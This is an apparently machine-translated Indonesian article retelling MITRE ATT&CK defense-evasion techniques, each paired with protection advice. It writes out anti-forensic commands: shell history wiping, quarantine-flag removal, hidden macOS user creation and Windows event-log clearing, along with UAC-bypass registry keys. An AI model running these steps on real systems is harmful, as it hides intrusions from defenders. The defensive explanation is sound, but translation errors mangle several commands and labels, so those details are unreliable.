Tautan ke semua bagian:Bagian 1. Mendapatkan akses awal (Akses Awal)Bagian 2. EksekusiBagian 3. Fastening (Kegigihan)Bagian 4. Eskalasi PrivilegeBagian 5. Pertahanan EvasionBagian 6. Mendapatkan kredensial (Akses Kredensial)Bagian 7. PenemuanBagian 8. Gerakan LateralBagian 9. Pengumpulan data (Pengumpulan)Bagian 10 PengelupasanBagian 11. Perintah dan KontrolBagian "Perlindungan Bypass" menjelaskan teknik yang digunakan penyerang untuk menyembunyikan aktivitas jahat dan mencegah deteksi oleh alat perlindungan. Berbagai variasi teknik dari bagian lain dari rantai serangan yang membantu mengatasi pertahanan spesifik dan tindakan pencegahan yang diambil oleh pihak pertahanan termasuk dalam teknik bypass pertahanan. Pada gilirannya, teknik bypass pertahanan diterapkan di semua fase serangan.
Penulis tidak bertanggung jawab atas konsekuensi yang mungkin dari penerapan informasi yang ditetapkan dalam artikel, dan juga meminta maaf atas kemungkinan ketidakakuratan yang dibuat dalam beberapa formulasi dan ketentuan. Informasi yang dipublikasikan adalah pengungkapan kembali gratis konten MITER ATT & CK .Sistem: Windows
Hak: Pengguna, Administrator
Deskripsi: Penyerang dapat menggunakan token akses untuk melakukan tindakan dalam berbagai konteks keamanan pengguna atau sistem, sehingga menghindari deteksi aktivitas jahat. Musuh dapat menggunakan fungsi Windows API untuk menyalin token akses dari proses yang ada (mencuri Token), untuk ini ia harus berada dalam konteks pengguna yang diistimewakan (misalnya, administrator). Pencurian token akses biasanya digunakan untuk meningkatkan hak istimewa dari tingkat administrator ke tingkat Sistem. Musuh juga dapat menggunakan token akses akun untuk otentikasi pada sistem jarak jauh, jika akun ini memiliki izin yang diperlukan pada sistem jarak jauh. Ada tiga cara utama untuk menyalahgunakan token akses.
Pencurian dan peniruan token.Peniruan token adalah kemampuan OS untuk memulai utas dalam konteks keamanan selain konteks proses di mana utas ini berada. Dengan kata lain, personifikasi token memungkinkan Anda untuk melakukan tindakan apa pun atas nama pengguna lain. Musuh dapat menduplikasi token akses menggunakan fungsi
DuplicateTokenEX dan menggunakan
ImpersonateLoggedOnUser untuk memanggil utas dalam konteks pengguna yang masuk, atau menggunakan
SetThreadToken untuk menetapkan token akses ke aliran.
Buat proses menggunakan token akses.Seorang penyerang dapat membuat token akses menggunakan fungsi
DuplicateTokenEX dan kemudian menggunakannya dengan
CreateProcessWithTokenW untuk membuat proses baru yang berjalan dalam konteks pengguna yang ditiru.
Memperoleh dan menyamar sebagai token akses.Musuh, yang memiliki nama pengguna dan kata sandi, dapat membuat sesi login menggunakan fungsi
LogonUser API, yang akan mengembalikan salinan token akses sesi sesi baru, dan kemudian, menggunakan
fungsi SetThreadToken , tetapkan token yang diterima ke aliran.
Metasploit Meterpreter dan
CobaltStrike memiliki alat untuk memanipulasi token akses untuk meningkatkan hak istimewa.
Rekomendasi perlindungan: Untuk memanfaatkan sepenuhnya taktik di atas, penyerang harus memiliki hak administrator sistem, jadi jangan lupa untuk membatasi hak istimewa pengguna biasa. Setiap pengguna dapat menipu token akses jika mereka memiliki kredensial yang sah. Batasi kemampuan pengguna dan grup untuk membuat token akses:
GPO: Konfigurasi Komputer> [Kebijakan]> Pengaturan Windows> Pengaturan Keamanan> Kebijakan Lokal> Penugasan Hak Pengguna: Buat objek token .
Tentukan juga siapa yang dapat mengganti token proses layanan lokal atau jaringan:
GPO: Konfigurasi Komputer> [Kebijakan]> Pengaturan Windows> Pengaturan Keamanan> Kebijakan Lokal> Penugasan Hak Pengguna: Ganti token level proses.Sistem: Windows
Hak: Pengguna, Administrator, Sistem
Deskripsi: Layanan Transfer Intelligent Latar Belakang Windows (BITS) adalah mekanisme untuk mentransfer file secara tidak sinkron melalui Component Object Model (COM) menggunakan bandwidth rendah. BITS biasanya digunakan oleh pembaru, pengirim pesan instan dan aplikasi lain yang lebih suka bekerja di latar belakang tanpa mengganggu pengoperasian aplikasi jaringan lainnya. Tugas transfer file direpresentasikan sebagai tugas BITS yang berisi antrian dari satu atau lebih operasi file. Antarmuka untuk membuat dan mengelola tugas BITS tersedia di alat PowerShell dan BITSAdmin. Penyerang dapat menggunakan BITS untuk mengunduh, meluncurkan, dan kemudian membersihkan setelah mengeksekusi kode berbahaya. Tugas BITS disimpan secara mandiri dalam basis data BITS, sementara sistem tidak membuat file atau entri registri baru, seringkali BITS diizinkan oleh firewall. Dengan bantuan tugas BITS, Anda dapat memperoleh pijakan dalam sistem dengan membuat tugas panjang (secara default 90 hari) atau dengan memanggil program sewenang-wenang setelah menyelesaikan tugas atau kesalahan BITS (termasuk setelah me-reboot OS).
Rekomendasi perlindungan: BITS adalah fungsionalitas OS standar, penggunaannya sulit dibedakan dari aktivitas jahat, oleh karena itu vektor perlindungan harus diarahkan untuk mencegah peluncuran alat jahat di awal rantai serangan. Menonaktifkan BITS sepenuhnya dapat menghentikan pembaruan perangkat lunak yang sah, namun, Anda dapat mempertimbangkan membatasi akses ke antarmuka BITS untuk pengguna dan grup akses tertentu, dan Anda juga dapat membatasi masa tugas BITS, yang ditetapkan dengan mengubah kunci berikut:
- HKEY_LOCAL_MACHINE \ Software \ Kebijakan \ Microsoft \ Windows \ BITS \ JobInactivityTimeout;
- HKEY_LOCAL_MACHINE \ Software \ Kebijakan \ Microsoft \ Windows \ BITS \ MaxDownloadTime .
Sistem: Windows, Linux, macOS
Deskripsi: Beberapa fitur keamanan memindai file dengan mencari tanda tangan statis. Lawan dapat menambahkan data ke file berbahaya untuk meningkatkan ukurannya ke nilai yang melebihi ukuran maksimum yang diijinkan dari file yang dipindai atau mengubah hash file untuk mem-bypass daftar blok hash dari peluncuran file dengan hash.
Rekomendasi perlindungan: Berikan identifikasi perangkat lunak yang berpotensi berbahaya dengan menerapkan alat seperti
AppLocker , alat yang masuk daftar putih dan kebijakan pembatasan perangkat lunak.
Sistem: Windows
Hak: Pengguna, Administrator
Deskripsi: Ada banyak cara untuk mem-bypass UAC, yang paling umum diterapkan dalam proyek
UACMe . Cara-cara baru untuk memotong UAC secara teratur ditemukan, seperti menyalahgunakan aplikasi sistem
eventvwr.exe , yang dapat mengeksekusi file biner atau skrip yang ditinggikan. Program jahat juga dapat tertanam dalam proses tepercaya di mana UAC memungkinkan peningkatan hak istimewa tanpa mendorong pengguna.
Untuk memintas UAC menggunakan eventvwr.exe, kunci dimodifikasi di registri Windows:
[HKEY_CURRENT_USER] \ Software \ Classes \ mscfile \ shell \ open \ command .
Untuk memintas UAC menggunakan sdclt.exe, kunci dalam registri Windows dimodifikasi:
[HKEY_CURRENT_USER] \ Software \ Microsoft \ Windows \ CurrentVersion \ App Paths \ control.exe;
[HKEY_CURRENT_USER] \ Software \ Classes \ exefile \ shell \ runas \ command \ terisolasiCommand.Rekomendasi perlindungan: Hapus pengguna dari grup administrator lokal di sistem yang dilindungi. Jika memungkinkan, aktifkan tingkat perlindungan tertinggi di pengaturan UAC.
Sistem: Windows
Hak: Pengguna
Deskripsi: Penginstal Profil Manajer Koneksi Microsoft (cmstp.exe) adalah utilitas "Connection Manager Profile Installer" yang ada di dalam Windows. Cmstp.exe dapat mengambil inf-file sebagai parameter, sehingga penyerang dapat menyiapkan INF berbahaya khusus untuk mengunduh dan mengeksekusi DLL atau skrip (* .sct) dari server jarak jauh yang melewati AppLocker dan kunci lainnya, karena cmstp.exe ditandatangani dengan sertifikat digital Microsoft.
Rekomendasi perlindungan: Memblokir peluncuran aplikasi yang berpotensi berbahaya. Memantau atau sepenuhnya memblokir
C: \ Windows \ System32 \ cmstp.exe diluncurkan .
Sistem: Linux, macOS
Hak: Pengguna
Deskripsi: Untuk kenyamanan pengguna di sistem macOS dan Linux, semua perintah yang dijalankan oleh pengguna di terminal dicatat. Pengguna dapat dengan cepat menjalankan perintah yang sebelumnya mereka lakukan di sesi lain. Ketika pengguna masuk ke sistem, sejarah perintah disimpan ke file yang ditentukan dalam variabel HISTFILE. Ketika pengguna logout, histori perintah disimpan di direktori home pengguna ~ / .bash_history. File histori perintah juga dapat berisi kata sandi yang dimasukkan oleh pengguna dalam teks yang jelas. Penyerang dapat mencari kata sandi dalam file histori perintah dan mengambil tindakan untuk mencegah aktivitas jahatnya agar tidak ditulis ke histori perintah, misalnya:
batalkan SEJARAH;
ekspor HISTFILESIZE = 0;
sejarah -c;
rm ~ / .bash_history.Rekomendasi perlindungan: Mencegah pengguna menghapus atau menulis file bash_history dapat mencegah musuh menyalahgunakan file-file ini, selain itu, membatasi hak pengguna untuk mengedit variabel HISTFILE dan HISTFILESIZE akan menjaga log eksekusi perintah.
Sistem: Windows, macOS
Deskripsi: Menandatangani kode secara digital memberikan otentikasi pengembang dan jaminan bahwa file tersebut belum dimodifikasi. Namun demikian, seperti yang Anda ketahui, lawan dapat menggunakan tanda tangan untuk menyamarkan malware sebagai file biner yang sah. Sertifikat tanda tangan digital dapat dibuat, dirusak atau dicuri oleh penyerang. Penandatanganan kode untuk verifikasi perangkat lunak pada awal pertama digunakan di Windows, macOS, OS X dan tidak digunakan di Linux karena struktur platform yang terdesentralisasi. Sertifikat penandatanganan kode dapat digunakan untuk mem-bypass kebijakan keamanan yang mengharuskan hanya kode yang ditandatangani dijalankan pada sistem.
Rekomendasi perlindungan: Penggunaan "daftar putih" perangkat lunak dan pemilihan penerbit perangkat lunak yang dapat diandalkan sebelum memverifikasi tanda tangan digital dapat mencegah eksekusi kode berbahaya atau tidak dipercaya dalam sistem yang dilindungi.
Sistem: Windows
Hak: Sistem
Deskripsi: Beberapa penjahat cyber dapat menggunakan alat-alat canggih untuk kompromi komponen komputer dan menginstal firmware jahat pada mereka yang akan menjalankan kode berbahaya di luar sistem operasi atau bahkan firmware sistem utama (Bios). Teknik ini terdiri dari mem-flash komponen komputer yang tidak memiliki sistem pemeriksaan integritas bawaan, misalnya, hard drive. Perangkat dengan firmware jahat dapat menyediakan akses konstan ke sistem yang diserang meskipun terjadi kegagalan dan penimpaan hard disk. Teknik ini dirancang untuk mengatasi perlindungan perangkat lunak dan kontrol integritas.
Sistem: Windows
Hak: Pengguna
Deskripsi: Microsoft Component Object Model (COM) adalah teknologi untuk membuat perangkat lunak berdasarkan komponen yang berinteraksi dari suatu objek, yang masing-masing dapat digunakan dalam banyak program secara bersamaan. Penyerang dapat menggunakan COM untuk menyuntikkan kode berbahaya yang dapat dieksekusi alih-alih yang sah dengan menangkap tautan dan tautan COM. Untuk mencegat objek COM, Anda perlu mengganti tautan ke komponen sistem yang sah di registri Windows. Panggilan lebih lanjut ke komponen ini akan mengeksekusi kode berbahaya.
Rekomendasi perlindungan: Tindakan pencegahan untuk mencegah serangan ini tidak dianjurkan, karena objek COM adalah bagian dari OS dan diinstal pada perangkat lunak sistem. Memblokir perubahan pada objek COM dapat memengaruhi stabilitas OS dan perangkat lunak. Vektor perlindungan disarankan untuk memblokir perangkat lunak berbahaya dan berpotensi berbahaya.
Sistem: Windows
Hak: Pengguna, Administrator, Sistem
Deskripsi: Taktiknya adalah menggunakan elemen-elemen Panel Kontrol Windows oleh penyerang untuk menjalankan perintah sewenang-wenang sebagai muatan (misalnya, virus
Reaver ). Objek berbahaya dapat disamarkan sebagai kontrol standar dan dikirim ke sistem menggunakan lampiran phishing. Utilitas untuk melihat dan mengonfigurasi pengaturan Windows adalah file exe yang terdaftar dan file CPL dari elemen panel kontrol Windows. File CPL sebenarnya berganti nama menjadi DLL yang dapat dijalankan dengan cara berikut:
- langsung dari baris perintah: control.exe <file.cpl> ;
- menggunakan fungsi API dari shell32.dll: rundll32.exe shell32.dll, Control_RunDLL <file.cpl> ;
- klik dua kali pada file cpl.
CPL terdaftar yang disimpan di System32 secara otomatis ditampilkan di Panel Kontrol Windows dan memiliki pengidentifikasi unik yang disimpan dalam registri:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ ControlPanel \ NameSpaceInformasi tentang CPL lain, misalnya, nama tampilan dan jalur ke file cpl, disimpan di bagian
Cpls dan
Extended Properties pada bagian ini:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Control PanelBeberapa CPL yang diluncurkan melalui shell terdaftar di bagian ini:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Controls Folder \ {name} \ shellex \ PropertySheetHandlersRekomendasi perlindungan: Batasi peluncuran dan penyimpanan file item panel kontrol hanya di folder yang dilindungi (misalnya,
C: \ Windows \ System32 ), aktifkan Kontrol Akun Pengguna (UAC) dan AppLocker untuk mencegah perubahan yang tidak sah pada sistem. Tentu saja, penggunaan perangkat lunak antivirus.
Sistem: Windows
Hak: Administrator
Deskripsi: DCShadow melibatkan pembuatan pengontrol domain palsu di jaringan yang diserang dengan bantuan, dengan menggunakan fungsionalitas API untuk berinteraksi dengan CD yang diserang, penyerang dapat memodifikasi data AD, termasuk perubahan pada objek domain, kredensial dan kunci tanpa diketahui oleh sistem SIEM. Toolkit untuk mengimplementasikan serangan adalah bagian dari mimikatz. DCShadow dapat digunakan untuk melakukan serangan injeksi SID-History dan untuk membuat backdoors untuk konsolidasi lebih lanjut dalam sistem.
Rekomendasi perlindungan: Mengingat bahwa teknik DCShadow didasarkan pada penyalahgunaan fitur desain AD, vektor perlindungan harus diarahkan untuk mencegah peluncuran alat serangan. Serangan dapat dideteksi dengan menganalisis replikasi jaringan replikasi CD, yang berjalan setiap 15 menit, tetapi dapat disebabkan oleh penyerang di luar jadwal.
Sistem: Windows
Hak: Pengguna, Administrator, Sistem
Deskripsi: Teknik ini terdiri dari mengeksploitasi kelemahan dalam algoritma untuk menemukan oleh aplikasi file DLL yang mereka perlukan untuk bekerja (
MSA2269637 ). Seringkali, direktori pencarian DLL adalah direktori kerja program, sehingga penyerang dapat mengganti sumber DLL dengan yang jahat dengan nama file yang sama.
Serangan jarak jauh pada pencarian DLL dapat dilakukan ketika program menginstal direktori saat ini di direktori jarak jauh, misalnya, berbagi jaringan. Juga, penyerang dapat secara langsung mengubah metode mencari dan memuat DLL dengan mengganti file .manifest atau .local, yang menggambarkan parameter pencarian DLL. Jika program yang diserang bekerja dengan tingkat hak istimewa yang tinggi, maka DLL jahat yang dimuat olehnya juga akan dieksekusi dengan hak yang tinggi. Dalam hal ini, teknik ini dapat digunakan untuk meningkatkan hak istimewa dari pengguna ke administrator atau Sistem.
Rekomendasi perlindungan: Mencegah pemuatan DLL jarak jauh (diaktifkan secara default di Windows Server 2012+ dan tersedia dengan pembaruan untuk XP + dan Server 2003+). Mengaktifkan mode pencarian aman untuk DLL, yang membatasi direktori pencarian ke direktori seperti
% SYSTEMROOT% sebelum melakukan pencarian DLL di direktori aplikasi saat ini.
Mengaktifkan Mode Pencarian DLL Aman:
Konfigurasi Komputer> [Kebijakan]> Template Administratif> MSS (Legacy): MSS: (SafeDllSearchMode) Mengaktifkan mode pencarian DLL Aman.Kunci registri yang sesuai:
HKLM \ SYSTEM \ CurrentControlSet \ Control \ Session Manager \ SafeDLLSearchMode.Pertimbangkan untuk mengaudit sistem yang dilindungi untuk memperbaiki kekurangan DLL menggunakan alat seperti PowerUP di PowerSploit. Jangan lupa tentang memblokir perangkat lunak berbahaya dan berpotensi berbahaya, serta mengikuti
rekomendasi Microsoft .
Sistem: Windows
Deskripsi: Serangan didasarkan pada kerentanan teknologi eksekusi paralel Side-by-Side (WinSxS atau SxS), intinya adalah untuk memungkinkan aplikasi menggunakan versi yang tidak kompatibel dari komponen kode yang sama. Repositori rakitan komponen terletak di folder c: \ windows \ winsxs. Setiap rakitan harus memiliki manifes yang terkait dengannya - file xml yang berisi informasi tentang file, kelas, antarmuka, pustaka, dan elemen lain dari rakitan. Mirip dengan teknik pembajakan pencarian DLL, musuh dapat memprovokasi aplikasi pengguna untuk "lateral" memuat DLL berbahaya, jalur yang ditentukan dalam file manifes perakitan.
% TEMP% \ RarSFX% \% PROFIL PENGGUNA% \ SXS;
% TEMP% \ RarSFX% \% PROFIL PENGGUNA% \ WinSxS.Rekomendasi perlindungan: Pembaruan perangkat lunak reguler, menginstal aplikasi dalam direktori yang dilindungi penulisan. Menggunakan sxstrace.exe untuk memeriksa file manifes untuk kerentanan pemuatan yang terlambat.
Sistem: Windows
Hak: Pengguna
Deskripsi: Penyerang dapat menggunakan kebingungan file dan informasi untuk menyembunyikan kode berbahaya dan artefak yang tersisa dari invasi.
Untuk menggunakan file seperti itu, lawan menggunakan teknik terbalik untuk mendobobekan / mendekode file atau informasi. Metode tersebut dapat melibatkan penggunaan malware, berbagai skrip, atau utilitas sistem, misalnya, ada metode yang dikenal untuk menggunakan utilitas certutil untuk memecahkan kode file yang dapat dieksekusi dari alat akses jarak jauh yang tersembunyi di dalam file sertifikat. Contoh lain adalah penggunaan perintah copu / b untuk mengumpulkan fragmen biner menjadi muatan berbahaya (Payload).File payload dapat dikompresi, diarsipkan, atau dienkripsi untuk menghindari deteksi. Terkadang, tindakan pengguna mungkin diperlukan untuk melakukan deobfusi atau dekripsi. Pengguna mungkin perlu memasukkan kata sandi untuk membuka file atau skrip yang dikompresi atau dienkripsi dengan konten berbahaya.Rekomendasi perlindungan: Identifikasi dan pemblokiran utilitas sistem yang tidak perlu atau perangkat lunak yang berpotensi berbahaya yang dapat digunakan untuk mendobobekan atau mendekripsi file menggunakan alat seperti AppLocker dan kebijakan pembatasan perangkat lunak.Sistem: Windows, Linux, macOSDeskripsi: Penyerang dapat menonaktifkan berbagai alat keamanan, menghancurkan proses pencatatan peristiwa, kunci registri sehingga alat keamanan tidak memulai selama aktivitas berbahaya, atau menggunakan metode lain untuk mengganggu pengoperasian pemindai keamanan atau laporan acara.Rekomendasi perlindungan: Pastikan bahwa hak akses ke proses, registri, dan file dikonfigurasikan dengan benar untuk mencegah pemutusan yang tidak sah atau gangguan dengan pengoperasian alat keamanan.Sistem: Windows, Linux, macOSHak: Deskripsi Pengguna : Seperti halnya perangkat lunak apa pun, perangkat lunak keamanan mungkin memiliki kerentanan yang dapat digunakan penyerang untuk menonaktifkan atau memintasinya.Rekomendasi perlindungan: Pembaruan perangkat lunak secara berkala, pengembangan dan implementasi proses manajemen kerentanan perangkat lunak. Menggunakan aplikasi virtualisasi dan segmentasi mikro dapat mengurangi risiko kemungkinan eksploitasi kerentanan.Sistem: Hak Windows : Administrator,Deskripsi Sistem : Teknik ini menyalahgunakan memori tambahan dari jendela Windows, yang disebut Memori Jendela Ekstra (EWM). Ukuran EWM adalah 40 byte, cocok untuk menyimpan pointer 32-bit dan sering digunakan untuk menunjukkan referensi ke prosedur. Program jahat selama rantai serangan dapat menempatkan pointer ke kode berbahaya di EWM, yang selanjutnya akan diluncurkan oleh proses aplikasi yang terinfeksi.Rekomendasi Perlindungan:Mengingat bahwa teknik injeksi EWM didasarkan pada penyalahgunaan fungsi pengembangan OS, upaya perlindungan harus diarahkan untuk mencegah peluncuran program jahat dan alat jahat. Merupakan praktik yang baik untuk mengidentifikasi dan memblokir perangkat lunak yang berpotensi berbahaya menggunakan AppLocker, aplikasi daftar putih, atau menerapkan Kebijakan Pembatasan Perangkat Lunak.Sistem: Windows, Linux, macOSHak: Deskripsi Pengguna : Berbagai alat, malware, dan file lain yang digunakan oleh musuh dapat meninggalkan jejak aktivitas peretas dalam sistem. Penyerang dapat menghapus file artefak ini selama invasi untuk mengurangi kemungkinan serangan terdeteksi atau menghapusnya pada akhir operasi mereka. Musuh dapat menggunakan kedua alat khusus untuk menjamin penghancuran informasi (misalnya, Windows Sysinternals Sdelete), dan alat yang dibangun ke dalam OS, misalnya DEL dan ipher.Rekomendasi perlindungan: Jika mungkin, blokir peluncuran utilitas sistem yang tidak perlu, alat pihak ketiga dan perangkat lunak yang berpotensi berbahaya yang dapat digunakan untuk menghancurkan file.Sistem: Hak Windows :Deskripsi Administrator : Windows dapat memungkinkan program mengakses secara langsung volume logis. Program dengan akses langsung dapat membaca dan menulis file langsung ke hard drive, menganalisis struktur data sistem file. Metode ini memintas kontrol akses file dan pemantauan sistem file. Utilitas seperti NinjaCopy berfungsi untuk melakukan tindakan di atas di PowerShell.Rekomendasi perlindungan: Memblokir perangkat lunak yang berpotensi berbahaya.Sistem: hak macOS : Pengguna, Deskripsi Administrator:MacOS dan OS X menggunakan teknologi Gatekeper, yang hanya menjalankan perangkat lunak tepercaya. Saat mengunduh aplikasi dari Internet, atribut khusus diatur dalam file com.apple.quarantine, yang menunjukkan bahwa Gatekeeper harus meminta izin kepada pengguna untuk mengeksekusi file yang diunduh. Bendera diatur sebelum menyimpan file ke disk, lalu ketika pengguna mencoba membuka file, Gatekeeper memeriksa bendera yang sesuai dan jika ada, sistem akan meminta pengguna untuk mengkonfirmasi peluncuran dan menampilkan URL dari mana file tersebut diunduh. Aplikasi yang diunduh ke sistem dari drive USB, optik, anak-anak atau drive jaringan tidak akan menyebabkan flag diatur dalam file com.apple.quarantine. Beberapa utilitas dan file yang masuk ke sistem yang diserang selama shadow boot (teknik Drive-by-compromise),juga tidak menyebabkan bendera ditetapkan untuk Gatekeeper, sehingga melewati pemeriksaan proxy. Kehadiran bendera karantina dapat diperiksa dengan perintah:xattr /path/to/MyApp.app .Bendera juga dapat dihapus dengan attr, tetapi ini akan memerlukan eskalasi hak istimewa:sudo xattr -r -d com.apple.quarantine /path/to/MyApp.appRekomendasi keamanan: Selain Gatekeeper, Anda harus menggunakan larangan memulai aplikasi yang tidak diunduh dari Toko Apple.Sistem: Linux, macOSHak: Deskripsi Pengguna : Variabel lingkungan HISTCONTROL mewakili daftar parameter untuk menyimpan sejarah perintah ke file ~ / .bash_history ketika pengguna logout. Misalnya, opsi ignorespace menunjukkan bahwa tidak perlu menyimpan garis yang dimulai dengan spasi, dan opsi ignoredups akan menonaktifkan penyimpanan perintah yang diulang dalam satu baris. Pada beberapa sistem Linux, opsi ignoreboth ditentukan secara default, yang menyiratkan penyertaan dua parameter di atas. Ini berarti bahwa perintah ls tidak akan disimpan dalam sejarah, tidak seperti ls.HISTCONTROL tidak digunakan secara default di macOS, tetapi dapat dikonfigurasi oleh pengguna. Penyerang dapat menggunakan fitur dari parameter HISTCONTROL untuk tidak meninggalkan jejak aktivitas mereka hanya dengan memasukkan spasi di depan perintah.Rekomendasi perlindungan: Mencegah pengguna mengubah variabel HISTCONTROL, dan juga memastikan bahwa HISTCONTROL diatur ke diabaikan dan tidak mengandung opsi ignoreboth dan ignorespace.Sistem: Windows, Linux, macOSHak: Deskripsi Pengguna : Pada Windows, pengguna dapat menyembunyikan file menggunakan perintah attrib. Cukup menentukan atribut + h <nama file> untuk menyembunyikan file atau "+ s" untuk menandai file sebagai sistem. Dengan menambahkan parameter "/ S", utilitas attrib akan menerapkan perubahan secara rekursif. Di Linux / Mac, pengguna dapat menyembunyikan file dan folder hanya dengan menentukan "." Di awal nama file. Setelah itu, file dan folder akan disembunyikan dari aplikasi Finder dan seperti utilitas ls.Di macOS, file dapat ditandai dengan UF_HIDDEN, yang akan menonaktifkan visibilitasnya di Finder.app, tetapi tidak akan mencegah file tersembunyi terlihat di Terminal.app. Banyak aplikasi membuat file dan folder tersembunyi agar tidak mengacaukan ruang kerja pengguna. Misalnya, utilitas SSH membuat folder .ssh tersembunyi yang menyimpan daftar host dan kunci pengguna yang dikenal.Penyerang dapat menggunakan kemampuan untuk menyembunyikan file dan folder agar tidak menarik perhatian pengguna.Rekomendasi perlindungan: Mencegah penggunaan teknik ini sulit karena fakta bahwa menyembunyikan file adalah fitur standar OS.Sistem: hak macOS : Administrator, rootKeterangan: Setiap akun macOS memiliki userID yang dapat ditentukan selama pembuatan pengguna. Sifat /Library/Preferences/com.apple.loginwindow memiliki pilihan Hide500Users , yang menyembunyikan ID pengguna 500 dan di bawah ke layar login. Dengan demikian, dengan membuat pengguna dengan pengidentifikasi <500 dan mengaktifkan Hide500Users, penyerang dapat menyembunyikan akunnya:sudo dscl. -create / Pengguna / nama pengguna UniqueID 401
default sudo tulis /Library/Preferences/com.apple.loginwindow Hide500Users -bool BENARRekomendasi perlindungan:Jika workstation berada dalam domain, maka kebijakan grup dapat membatasi kemampuan untuk membuat dan menyembunyikan pengguna. Demikian pula, kemampuan untuk memodifikasi properti /Library/Preferences/com.apple.loginwindow dicegah.Sistem: hak macOS :Deskripsi Pengguna : Opsi peluncuran aplikasi pada macOS dan OS X tercantum dalam file properti plist. Salah satu tag di file apple.awt.UIElement ini termasuk menyembunyikan ikon aplikasi Java dari Dock. Biasanya, tag ini digunakan untuk aplikasi yang berjalan di baki sistem, tetapi penyerang dapat menyalahgunakan fitur ini dan menyembunyikan aplikasi jahat.Rekomendasi perlindungan: Pantau daftar program yang memiliki tag apple.awt.UIElement di properti plist.Sistem: Hak Windows : Administrator,Deskripsi Sistem : Mekanisme Opsi Eksekusi File Gambar (IFEO) memungkinkan Anda untuk menjalankan debugger program alih-alih program, yang sebelumnya ditentukan oleh pengembang dalam registri:- HKLM \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Opsi Eksekusi File Gambar / [dieksekusi]
- HKLM \ SOFTWARE \ Wow6432Node \ Microsoft \ Windows NT \ CurrentVersion \ Opsi Eksekusi File Gambar \ [executable] , di mana [executable] adalah biner yang dapat dieksekusi dari debugger.
Seperti injeksi, nilai [yang dapat dieksekusi] dapat disalahgunakan dengan menjalankan kode arbitrer untuk meningkatkan hak istimewa atau mendapatkan pijakan dalam sistem. Program jahat dapat menggunakan IFEO untuk memintas perlindungan dengan mendaftarkan debugger yang mengarahkan dan menolak berbagai sistem dan aplikasi keamanan.Rekomendasi perlindungan: Teknik yang dijelaskan didasarkan pada penyalahgunaan alat pengembangan OS biasa, sehingga pembatasan apa pun dapat menyebabkan ketidakstabilan perangkat lunak yang sah, misalnya, aplikasi keamanan. Upaya untuk mencegah penggunaan teknik injeksi IFEO perlu difokuskan pada tahap awal rantai serangan. Untuk mendeteksi serangan tersebut dengan menggunakan proses pemantauan bendera Debug_process danProses Debug_only_ini_ .Sistem: WindowsKeterangan: Penyerang dapat mencoba memblokir berbagai indikator atau peristiwa yang ditangkap oleh alat keamanan untuk analisis lebih lanjut. Aktivitas jahat dapat mencakup memodifikasi file konfigurasi keamanan, kunci registri, atau mengarahkan ulang peristiwa telemetri dengan jahat.Saat berurusan dengan alat analisis aktivitas jaringan, penyerang dapat memblokir lalu lintas yang terkait dengan mengirim laporan ke server manajemen keamanan. Ini dapat dilakukan dengan banyak cara, misalnya, dengan menghentikan proses lokal yang bertanggung jawab untuk mentransmisikan telemetri, membuat aturan di firewall untuk memblokir lalu lintas ke host yang bertanggung jawab untuk mengagregasi peristiwa keamanan.Rekomendasi Perlindungan:Pastikan pelacak dan pengirim acara, kebijakan firewall, dan mekanisme terkait lainnya dilindungi oleh izin dan kontrol akses yang sesuai. Pertimbangkan untuk memulai kembali secara otomatis fasilitas penerusan acara keamanan pada interval yang berulang, serta kemampuan untuk menerapkan manajemen perubahan yang sesuai dengan aturan firewall dan konfigurasi sistem lainnya.Sistem: Windows, Linux, macOSKeterangan:Jika aplikasi jahat dikarantina atau diblokir, penyerang dapat menentukan alasan untuk mendeteksi alatnya (indikator), mengubah alat dengan menghapus indikator dari itu, dan menggunakan versi terbaru dari malware yang tidak akan terdeteksi dengan cara perlindungan. Contoh yang baik adalah deteksi malware menggunakan checksum atau tanda tangan file dan mengkarantina mereka dengan perangkat lunak antivirus. Penyerang yang menentukan bahwa malware telah dikarantina oleh perangkat lunak antivirus karena tanda tangannya / checksum dapat menggunakan teknik pengemasan perangkat lunak atau metode lain untuk memodifikasi file untuk mengubah tanda tangan atau checksum, dan kemudian menggunakan kembali malware ini.Rekomendasi Perlindungan:Musuh mungkin memiliki akses ke sistem dan tahu metode dan alat apa yang diblokir oleh perlindungan penduduk. Gunakan metode canggih untuk mengatur fitur keamanan dan keselamatan, jelajahi proses kemungkinan kompromi sistem yang dilindungi untuk mengatur proses peringatan tentang kemungkinan intrusi.Identifikasi dan blokir perangkat lunak yang berpotensi berbahaya dan berbahaya menggunakan alat yang masuk daftar putih seperti AppLocker dan kebijakan pembatasan perangkat lunak.Deteksi pertama alat jahat dapat memicu peringatan ke sistem anti-virus atau alat keamanan lainnya. Peristiwa semacam itu dapat terjadi pada perimeter dan dapat dideteksi menggunakan sistem IDS, pemindaian surat, dll. Deteksi awal harus dianggap sebagai tanda dimulainya invasi, yang membutuhkan penyelidikan cermat di luar "tempat" kejadian awal. Penyerang dapat melanjutkan serangan, dengan asumsi bahwa peristiwa perangkat lunak anti-virus tertentu tidak akan diselidiki atau bahwa analis tidak akan dapat mengaitkan acara terdaftar secara permanen dengan aktivitas lain yang terjadi di jaringan.Sistem: Windows, Linux, macOSKeterangan: Penyerang dapat menghapus atau memodifikasi artefak yang dihasilkan dalam sistem yang diserang, termasuk log dan file yang dicegat yang dikarantina. Lokasi dan format log dapat bervariasi tergantung pada OS, log sistem dicatat sebagai Windows Event atau file Linux / macOS seperti /.bash_history dan .var / log / *.Tindakan yang ditargetkan yang mengganggu operasi pengumpulan acara dan mekanisme peringatan yang dapat digunakan untuk mendeteksi intrusi dapat membahayakan alat keamanan, akibatnya peristiwa keamanan tidak akan dianalisis. Tindakan tersebut dapat mempersulit proses pemeriksaan dan tanggapan karena kurangnya data tentang serangan tersebut.Menghapus Windows Event LogsWindows Event Logs adalah catatan peringatan dan notifikasi serta operasi sistem. Microsoft mendefinisikan acara tersebut sebagai "peristiwa penting apa pun dalam sistem atau program yang memerlukan pemberitahuan kepada pengguna atau pencatatan." Ada tiga sumber sistem peristiwa: sistem, aplikasi, dan keamanan.Lawan yang melakukan tindakan terkait dengan manajemen akun, masuk ke akun, akses ke layanan direktori, dll. dapat menghapus log peristiwa untuk menyembunyikan tindakan mereka.Log peristiwa dapat dibersihkan dengan utilitas konsol berikut:sistem wevtutil cl;
